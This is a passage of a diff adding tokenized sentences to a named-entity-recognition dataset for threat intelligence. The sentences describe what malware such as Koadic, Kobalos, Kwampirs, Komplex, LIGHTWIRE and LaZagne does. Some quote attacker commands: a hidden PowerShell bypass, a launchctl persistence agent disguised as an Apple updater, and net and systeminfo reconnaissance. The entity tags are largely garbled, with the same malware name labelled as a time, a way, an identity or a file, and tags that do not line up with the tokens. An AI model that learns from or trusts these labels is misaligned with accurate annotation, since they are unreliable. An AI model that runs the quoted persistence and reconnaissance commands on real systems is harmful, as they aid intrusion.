"user", + "clipboard." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Koadic", + "can", + "download", + "files", + "off", + "the", + "target", + "system", + "to", + "send", + "back", + "to", + "the", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Koadic", + "can", + "perform", + "process", + "injection", + "by", + "using", + "a", + "reflective", + "DLL." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "Koadic", + "can", + "obtain", + "a", + "list", + "of", + "directories." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Koadic", + "has", + "used", + "the", + "command", + "<code>Powershell.exe", + "-ExecutionPolicy", + "Bypass", + "-WindowStyle", + "Hidden</code>", + "to", + "hide", + "its", + "window." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Koadic", + "can", + "download", + "additional", + "files", + "and", + "tools." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "Koadic", + "can", + "use", + "mshta", + "to", + "serve", + "additional", + "payloads", + "and", + "to", + "help", + "schedule", + "tasks", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Koadic", + "can", + "gather", + "hashed", + "passwords", + "by", + "gathering", + "domain", + "controller", + "hashes", + "from", + "NTDS." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "B-HackOrg", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Koadic", + "can", + "scan", + "for", + "open", + "TCP", + "ports", + "on", + "the", + "target", + "network." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Koadic", + "can", + "scan", + "local", + "network", + "for", + "open", + "SMB." + ], + "ner_tags": [ + "B-Way", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Koadic", + "has", + "used", + "PowerShell", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Koadic", + "has", + "added", + "persistence", + "to", + "the", + "`HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`", + "Registry", + "key." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Koadic", + "can", + "use", + "Regsvr32", + "to", + "execute", + "additional", + "payloads." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Koadic", + "can", + "enable", + "remote", + "desktop", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Koadic", + "can", + "use", + "Rundll32", + "to", + "execute", + "additional", + "payloads." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "Koadic", + "has", + "used", + "scheduled", + "tasks", + "to", + "add", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Koadic", + "can", + "gather", + "hashed", + "passwords", + "by", + "dumping", + "SAM/SECURITY", + "hive." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Koadic", + "can", + "run", + "a", + "command", + "on", + "another", + "machine", + "using", + "PsExec." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Koadic", + "can", + "obtain", + "the", + "OS", + "version", + "and", + "build,", + "computer", + "name,", + "and", + "processor", + "architecture", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Koadic", + "can", + "retrieve", + "the", + "contents", + "of", + "the", + "IP", + "routing", + "table", + "as", + "well", + "as", + "information", + "about", + "the", + "Windows", + "domain." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Koadic", + "can", + "identify", + "logged", + "in", + "users", + "across", + "the", + "domain", + "and", + "views", + "user", + "sessions." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Koadic", + "performs", + "most", + "of", + "its", + "operations", + "using", + "Windows", + "Script", + "Host", + "(VBScript)", + "and", + "runs", + "arbitrary", + "shellcode", + "." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Koadic", + "has", + "used", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Koadic", + "can", + "open", + "an", + "interactive", + "command-shell", + "to", + "perform", + "command", + "line", + "functions", + "on", + "victim", + "machines.", + "Koadic", + "performs", + "most", + "of", + "its", + "operations", + "using", + "Windows", + "Script", + "Host", + "(Jscript)", + "and", + "to", + "run", + "arbitrary", + "shellcode." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "Koadic", + "can", + "use", + "WMI", + "to", + "execute", + "commands." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kobalos's", + "authentication", + "and", + "key", + "exchange", + "is", + "performed", + "using", + "RSA-512." + ], + "ner_tags": [ + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Kobalos", + "can", + "remove", + "all", + "command", + "history", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kobalos", + "replaced", + "the", + "SSH", + "client", + "with", + "a", + "trojanized", + "SSH", + "client", + "to", + "steal", + "credentials", + "on", + "compromised", + "systems." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kobalos", + "can", + "write", + "captured", + "SSH", + "connection", + "credentials", + "to", + "a", + "file", + "under", + "the", + "<code>/var/run</code>", + "directory", + "with", + "a", + "<code>.pid</code>", + "extension", + "for", + "exfiltration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kobalos", + "decrypts", + "strings", + "right", + "after", + "the", + "initial", + "communication,", + "but", + "before", + "the", + "authentication", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kobalos", + "can", + "exfiltrate", + "credentials", + "over", + "the", + "network", + "via", + "UDP." + ], + "ner_tags": [ + "B-Tool", + "O", + "B-SamFile", + "B-Purp", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Kobalos", + "has", + "used", + "a", + "compromised", + "SSH", + "client", + "to", + "capture", + "the", + "hostname,", + "port,", + "username", + "and", + "password", + "used", + "to", + "establish", + "an", + "SSH", + "connection", + "from", + "the", + "compromised", + "host." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kobalos", + "can", + "chain", + "together", + "multiple", + "compromised", + "machines", + "as", + "proxies", + "to", + "reach", + "their", + "final", + "targets." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kobalos", + "encrypts", + "all", + "strings", + "using", + "RC4", + "and", + "bundles", + "all", + "functionality", + "into", + "a", + "single", + "function", + "call." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kobalos's", + "post-authentication", + "communication", + "channel", + "uses", + "a", + "32-byte-long", + "password", + "with", + "RC4", + "for", + "inbound", + "and", + "outbound", + "traffic." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kobalos", + "can", + "record", + "the", + "hostname", + "and", + "kernel", + "version", + "of", + "the", + "target", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kobalos", + "can", + "record", + "the", + "IP", + "address", + "of", + "the", + "target", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kobalos", + "can", + "modify", + "timestamps", + "of", + "replaced", + "files,", + "such", + "as", + "<code>ssh</code>", + "with", + "the", + "added", + "credential", + "stealer", + "or", + "<code>sshd</code>", + "used", + "to", + "deploy", + "Kobalos." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Kobalos", + "is", + "triggered", + "by", + "an", + "incoming", + "TCP", + "connection", + "to", + "a", + "legitimate", + "service", + "from", + "a", + "specific", + "source", + "port." + ], + "ner_tags": [ + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kobalos", + "can", + "spawn", + "a", + "new", + "pseudo-terminal", + "and", + "execute", + "arbitrary", + "commands", + "at", + "the", + "command", + "prompt." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Komplex", + "trojan", + "supports", + "file", + "deletion." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Komplex", + "payload", + "is", + "stored", + "in", + "a", + "hidden", + "directory", + "at", + "<code>/Users/Shared/.local/kextd</code>." + ], + "ner_tags": [ + "O", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Komplex", + "trojan", + "creates", + "a", + "persistent", + "launch", + "agent", + "called", + "with", + "<code>$HOME/Library/LaunchAgents/com.apple.updates.plist</code>", + "with", + "<code>launchctl", + "load", + "-w", + "~/Library/LaunchAgents/com.apple.updates.plist</code>." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "OsInfo", + "function", + "in", + "Komplex", + "collects", + "a", + "running", + "process", + "list." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "B-Way", + "I-Features", + "I-Features", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "The", + "Komplex", + "C2", + "channel", + "uses", + "an", + "11-byte", + "XOR", + "algorithm", + "to", + "hide", + "data." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "OsInfo", + "function", + "in", + "Komplex", + "collects", + "the", + "current", + "running", + "username." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "B-Way", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "The", + "Komplex", + "C2", + "channel", + "uses", + "HTTP", + "POST", + "requests." + ], + "ner_tags": [ + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Before", + "writing", + "to", + "disk,", + "Kwampirs", + "inserts", + "a", + "randomly", + "generated", + "string", + "into", + "the", + "middle", + "of", + "the", + "decrypted", + "payload", + "in", + "an", + "attempt", + "to", + "evade", + "hash-based", + "detections." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kwampirs", + "decrypts", + "and", + "extracts", + "a", + "copy", + "of", + "its", + "main", + "DLL", + "payload", + "when", + "executing." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kwampirs", + "collects", + "a", + "list", + "of", + "domain", + "groups", + "with", + "the", + "command", + "<code>net", + "localgroup", + "/domain</code>." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kwampirs", + "downloads", + "additional", + "files", + "that", + "are", + "base64-encoded", + "and", + "encrypted", + "with", + "another", + "cipher." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kwampirs", + "uses", + "a", + "large", + "list", + "of", + "C2", + "servers", + "that", + "it", + "cycles", + "through", + "until", + "a", + "successful", + "connection", + "is", + "established." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kwampirs", + "collects", + "a", + "list", + "of", + "files", + "and", + "directories", + "in", + "C:\\", + "with", + "the", + "command", + "<code>dir", + "/s", + "/a", + "c:\\", + ">>", + "\"C:\\windows\\TEMP\\[RANDOM].tmp\"</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "Kwampirs", + "downloads", + "additional", + "files", + "from", + "C2", + "servers." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kwampirs", + "collects", + "a", + "list", + "of", + "accounts", + "with", + "the", + "command", + "<code>net", + "users</code>." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kwampirs", + "collects", + "a", + "list", + "of", + "users", + "belonging", + "to", + "the", + "local", + "users", + "and", + "administrators", + "groups", + "with", + "the", + "commands", + "<code>net", + "localgroup", + "administrators</code>", + "and", + "<code>net", + "localgroup", + "users</code>." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kwampirs", + "establishes", + "persistence", + "by", + "adding", + "a", + "new", + "service", + "with", + "the", + "display", + "name", + "\"WMI", + "Performance", + "Adapter", + "Extension\"", + "in", + "an", + "attempt", + "to", + "masquerade", + "as", + "a", + "legitimate", + "WMI", + "service." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kwampirs", + "collects", + "a", + "list", + "of", + "network", + "shares", + "with", + "the", + "command", + "<code>net", + "share</code>." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kwampirs", + "collects", + "password", + "policy", + "information", + "with", + "the", + "command", + "<code>net", + "accounts</code>." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kwampirs", + "collects", + "a", + "list", + "of", + "running", + "services", + "with", + "the", + "command", + "<code>tasklist", + "/v</code>." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kwampirs", + "collects", + "a", + "list", + "of", + "available", + "servers", + "with", + "the", + "command", + "<code>net", + "view</code>." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kwampirs", + "uses", + "rundll32.exe", + "in", + "a", + "Registry", + "value", + "added", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kwampirs", + "copies", + "itself", + "over", + "network", + "shares", + "to", + "move", + "laterally", + "on", + "a", + "victim", + "network." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kwampirs", + "collects", + "OS", + "version", + "information", + "such", + "as", + "registered", + "owner", + "details,", + "manufacturer", + "details,", + "processor", + "type,", + "available", + "storage,", + "installed", + "patches,", + "hostname,", + "version", + "info,", + "system", + "date,", + "and", + "other", + "system", + "information", + "by", + "using", + "the", + "commands", + "<code>systeminfo</code>,", + "<code>net", + "config", + "workstation</code>,", + "<code>hostname</code>,", + "<code>ver</code>,", + "<code>set</code>,", + "and", + "<code>date", + "/t</code>." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kwampirs", + "collects", + "network", + "adapter", + "and", + "interface", + "information", + "by", + "using", + "the", + "commands", + "<code>ipconfig", + "/all</code>,", + "<code>arp", + "-a</code>", + "and", + "<code>route", + "print</code>.", + "It", + "also", + "collects", + "the", + "system's", + "MAC", + "address", + "with", + "<code>getmac</code>", + "and", + "domain", + "configuration", + "with", + "<code>net", + "config", + "workstation</code>." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kwampirs", + "collects", + "a", + "list", + "of", + "active", + "and", + "listening", + "connections", + "by", + "using", + "the", + "command", + "<code>netstat", + "-nao</code>", + "as", + "well", + "as", + "a", + "list", + "of", + "available", + "network", + "mappings", + "with", + "<code>net", + "use</code>." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kwampirs", + "collects", + "registered", + "owner", + "details", + "by", + "using", + "the", + "commands", + "<code>systeminfo</code>", + "and", + "<code>net", + "config", + "workstation</code>." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kwampirs", + "collects", + "a", + "list", + "of", + "running", + "services", + "with", + "the", + "command", + "<code>tasklist", + "/svc</code>." + ], + "ner_tags": [ + "B-SamFile", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Kwampirs", + "creates", + "a", + "new", + "service", + "named", + "WmiApSrvEx", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LIGHTWIRE", + "can", + "imbed", + "itself", + "into", + "the", + "legitimate", + "`compcheckresult.cgi`", + "component", + "of", + "Ivanti", + "Connect", + "Secure", + "VPNs", + "to", + "enable", + "command", + "execution." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LIGHTWIRE", + "can", + "RC4", + "decrypt", + "and", + "Base64", + "decode", + "C2", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "B-Features", + "O", + "B-HackOrg", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LIGHTWIRE", + "can", + "RC4", + "encrypt", + "C2", + "commands." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Features", + "B-HackOrg", + "O" + ] + }, + { + "tokens": [ + "LIGHTWIRE", + "can", + "use", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LIGHTWIRE", + "is", + "a", + "web", + "shell", + "capable", + "of", + "command", + "execution", + "and", + "establishing", + "persistence", + "on", + "compromised", + "Ivanti", + "Secure", + "Connect", + "VPNs." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LITTLELAMB.WOOLTEA", + "can", + "communicate", + "over", + "SSL", + "using", + "the", + "private", + "key", + "from", + "the", + "Ivanti", + "Connect", + "Secure", + "web", + "server." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LITTLELAMB.WOOLTEA", + "can", + "append", + "malicious", + "components", + "to", + "the", + "`tmp/tmpmnt/bin/samba_upgrade.tar`", + "archive", + "inside", + "the", + "factory", + "reset", + "partition", + "in", + "attempt", + "to", + "persist", + "post", + "reset." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Features", + "B-Features", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LITTLELAMB.WOOLTEA", + "can", + "initialize", + "itself", + "as", + "a", + "daemon", + "to", + "run", + "persistently", + "in", + "the", + "background." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LITTLELAMB.WOOLTEA", + "can", + "monitor", + "for", + "system", + "upgrade", + "events", + "by", + "checking", + "for", + "the", + "presence", + "of", + "`/tmp/data/root/dev`." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "LITTLELAMB.WOOLTEA", + "can", + "function", + "as", + "a", + "stand-alone", + "backdoor", + "communicating", + "over", + "the", + "`/tmp/clientsDownload.sock`", + "socket." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "LITTLELAMB.WOOLTEA", + "has", + "the", + "ability", + "to", + "function", + "as", + "a", + "SOCKS", + "proxy." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "LITTLELAMB.WOOLTEA", + "can", + "check", + "the", + "type", + "of", + "Ivanti", + "VPN", + "device", + "it", + "is", + "running", + "on", + "by", + "executing", + "`first_run()`", + "to", + "identify", + "the", + "first", + "four", + "bytes", + "of", + "the", + "motherboard", + "serial", + "number." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LOWBALL", + "uses", + "the", + "Dropbox", + "cloud", + "storage", + "service", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LOWBALL", + "uses", + "the", + "Dropbox", + "API", + "to", + "request", + "two", + "files,", + "one", + "of", + "which", + "is", + "the", + "same", + "file", + "as", + "the", + "one", + "dropped", + "by", + "the", + "malicious", + "email", + "attachment.", + "This", + "is", + "most", + "likely", + "meant", + "to", + "be", + "a", + "mechanism", + "to", + "update", + "the", + "compromised", + "host", + "with", + "a", + "new", + "version", + "of", + "the", + "LOWBALL", + "malware." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "LOWBALL", + "command", + "and", + "control", + "occurs", + "via", + "HTTPS", + "over", + "port", + "443." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LaZagne", + "can", + "obtain", + "credential", + "information", + "from", + "/etc/shadow", + "using", + "the", + "shadow.py", + "module." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "LaZagne", + "can", + "perform", + "credential", + "dumping", + "from", + "MSCache", + "to", + "obtain", + "account", + "and", + "password", + "information." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "LaZagne", + "can", + "obtain", + "credentials", + "from", + "chats,", + "databases,", + "mail,", + "and", + "WiFi." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "LaZagne", + "can", + "obtain", + "credentials", + "from", + "databases,", + "mail,", + "and", + "WiFi", + "across", + "multiple", + "platforms." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, 